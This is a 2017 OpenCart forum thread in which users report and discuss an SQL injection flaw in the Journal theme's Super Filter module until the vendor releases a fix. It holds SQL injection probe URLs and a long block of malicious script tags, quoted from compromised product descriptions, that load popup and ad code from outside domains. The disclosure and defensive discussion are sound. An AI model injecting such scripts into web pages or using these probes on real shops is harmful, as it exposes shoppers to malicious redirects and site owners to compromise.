Post by Agit » Mon May 01, 2017 4:38 am

hi , journal theme have sql injection bug.
i founded last version, please close super filter module.
Journal Theme Ownership Here ?

SQL Injection : https://www.journal-theme.com/4/index.p ... d=7'Inject Here

Software Developer | PHP | Python | Javascript | C# | Node JS | Integration


Newbie

Posts

Joined
Fri Mar 20, 2015 2:54 pm

Post by rhysjuk » Mon May 01, 2017 5:31 am

I have also found the journal theme to have a vulnerability to SQL injections.
Somehow the injection is able to inject a JavaScript into the product description forcing popup websites to customers viewing the description. I've managed to stop the injection but cannot provide information yet for security reasons, the loss of income my client has endured is huge. I believe the Journal devs should take responsibility to fix this bug.

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am

Post by IP_CAM » Mon May 01, 2017 5:48 am

I believe the Journal devs should take responsibility to fix this bug

May be the case, but this is sure not an OpenCart Problem, so, it will, other than warning users,
make not much sense, to publish this here. Journal has it's own Site, to communicate with their
Customers, after all, it's a paid Theme, and they made a fortune on it.
Just to mention it! ;)
Ernie
Last edited by IP_CAM on Mon May 01, 2017 6:41 am, edited 1 time in total.

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by rhysjuk » Mon May 01, 2017 5:56 am

I don't believe this topic should remain solely with Journal, it should still be discussed here also. I don't see any negative reasons not to share this information with the community?

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am

Post by IP_CAM » Mon May 01, 2017 6:21 am

Well, I wrote it, just to make it clear for those, unaware of, that OC and Journal are different Things! ;)

I just tried to do the same with one one my 1.5.6.5 Test Shops, and there was no
problem because of this SIMPLE manufacturer'Inject link HACK, It only displayed a
regular OC "cannot find" message Page. Still, I am rerouting all such call's, on a
daily schedule, there is not a single day, without hacking-attempts, many from Sources,
looking for Magento-Holes, and others, just testing out a system. I am greatful for this, still
I am locking such IP_Ranges out for good... :laugh: , not planning to do international sales...
---
Just the official OC-2 Demo Site at least produced a 500 Internal Server Error
https://demo.opencart.com/index.php?rou ... r%27Inject
but it's an old V2-Version, so, I advise everybody, reading this, to just try it out your own Shop.
http:// yourshop. ext/ index.php?route=product/manufacturer%27Inject
---
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by Agit » Mon May 01, 2017 6:29 am

IP_CAM wrote:
Mon May 01, 2017 6:21 am
Well, I wrote it, just to make it clear for those, unaware of, that OC and Journal are different Things! ;)

I just tried to do the same with one one my 1.5.6.5 Test Shops, and there was no
problem because of this SIMPLE manufacturer'Inject link HACK, It only displayed a
regular OC "cannot find" message Page. Still, I am rerouting all such call's, on a
daily schedule, there is not a single day, without hacking-attempts, many from Sources,
looking for Magento-Holes, and others, just testing out a system. I am greatful for this, still
I am locking such IP_Ranges out for good... :laugh: , not planning to do international sales...
---
Just the official OC-2 Demo Site at least produced a 500 Internal Server Error
https://demo.opencart.com/index.php?rou ... r%27Inject
but it's an old V2-Version, so, I advise everybody, reading this, to just try it out your own Shop.
http:// yourshop. ext/ index.php?route=product/manufacturer%27Inject
---
Ernie
You testing url wrong , journal theme last version have bug.A critical vulnerability.Everyone needs to be informed.E-commerce is a serious business.

Software Developer | PHP | Python | Javascript | C# | Node JS | Integration


Newbie

Posts

Joined
Fri Mar 20, 2015 2:54 pm

Post by sims » Mon May 01, 2017 6:38 am

Does this code get put in the product and category descriptions ?

If so it's not just the Journal theme, I know of at least 2 cases (and they are not using Journal)

Code: Select all

<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script>

New member

Posts

Joined
Fri Apr 21, 2017 11:49 pm

Post by rhysjuk » Mon May 01, 2017 6:51 am

Yes Sims that's very similar just different urls, I found a way to stop that from being injected but causes a small error on the site. I fear publishing the fix would compromise my clients site. Wondering how I can provide this information to genuine Opencart admins.

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am

Post by sims » Mon May 01, 2017 8:00 am

Hi Rhys
Thanks for the reply, sounds like we need to compare notes! as I have a reasonable idea how to block this now

I sent you a PM

New member

Posts

Joined
Fri Apr 21, 2017 11:49 pm

Post by rhysjuk » Mon May 01, 2017 8:28 am

sims wrote:
Mon May 01, 2017 8:00 am
Hi Rhys
Thanks for the reply, sounds like we need to compare notes! as I have a reasonable idea how to block this now

I sent you a PM
Hi Sims,
I've sent you a PM with my findings, It's stuck in my outbox so not sure if it's bugged - have you received it?
Thanks
Rhys

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am

Post by sims » Mon May 01, 2017 8:47 am

Rhys

yep got it - thanks

I'll compose a reply later today

New member

Posts

Joined
Fri Apr 21, 2017 11:49 pm

Post by IP_CAM » Mon May 01, 2017 8:54 am

well, i did it by just clicking the link, as you showed it above, and it produces the same error on all Journal
test Pages. The Link may contain much more code, but in the Case of Journal, one single character and a
word will bring the system and DB to a hold.
---
https://www.journal-theme.com/7/index.p ... 7%27Inject
https://www.journal-theme.com/6/index.p ... 7%27Inject
https://www.journal-theme.com/5/index.p ... 7%27Inject
https://www.journal-theme.com/4/index.p ... 7%27Inject
https://www.journal-theme.com/3/index.p ... 7%27Inject
https://www.journal-theme.com/2/index.p ... 7%27Inject
---
And if anyone finds that big bunch of code, shown above, anywhere in the software, something went very wrong,
but probably not because of OC, or a 'clean' well known paid Theme only. :-\

Still, as long as it does not produce anything on my Server and Software, exept for a not found Page, I have no
problem to solve, and that makes me sleep much better, at least ! 8)
Ernie

PS. But actually, I am not surprised, considering the great amount of 'darkwhite' Copies available, on the Web.
There must be a purpose, to just give away 'stuff'. One should also be aware of this, the chances, of beeing 'hit',
are real, I would be able to prove it... >:D
Just to mention this very fact as well!
Good Luck
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by roberttimes » Wed May 03, 2017 7:02 pm

IP_CAM wrote:
Mon May 01, 2017 8:54 am

well, i did it by just clicking the link, as you showed it above, and it produces the same error on all Journal
test Pages. The Link may contain much more code, but in the Case of Journal, one single character and a
word will bring the system and DB to a hold.
---
https://www.journal-theme.com/7/index.p ... 7%27Inject
https://www.journal-theme.com/6/index.p ... 7%27Inject
https://www.journal-theme.com/5/index.p ... 7%27Inject
https://www.journal-theme.com/4/index.p ... 7%27Inject
https://www.journal-theme.com/3/index.p ... 7%27Inject
https://www.journal-theme.com/2/index.p ... 7%27Inject
---
And if anyone finds that big bunch of code, shown above, anywhere in the software, something went very wrong,
but probably not because of OC, or a 'clean' well known paid Theme only. :-\

Still, as long as it does not produce anything on my Server and Software, exept for a not found Page, I have no
problem to solve, and that makes me sleep much better, at least ! 8)
Ernie

PS. But actually, I am not surprised, considering the great amount of 'darkwhite' Copies available, on the Web.
There must be a purpose, to just give away 'stuff'. One should also be aware of this, the chances, of beeing 'hit',
are real, I would be able to prove it... >:D
Just to mention this very fact as well!
Good Luck
Ernie


It seems this has been addressed by Digital Atelier already as those links don't throw any errors now. Everyone should update the theme to the latest version.

Newbie

Posts

Joined
Tue May 31, 2011 10:31 pm

Post by Agit » Thu May 04, 2017 4:29 am

Journal Team fixed bug ,

v. 2.9.8 – May 3, 2017
Fixed an issue with Banners carousel mode
Fixed an issue with Super Filter manufacturer IDs - Bug fix
Other minor fixes and improvements.

Software Developer | PHP | Python | Javascript | C# | Node JS | Integration


Newbie

Posts

Joined
Fri Mar 20, 2015 2:54 pm
Who is online

Users browsing this forum: No registered users and 22 guests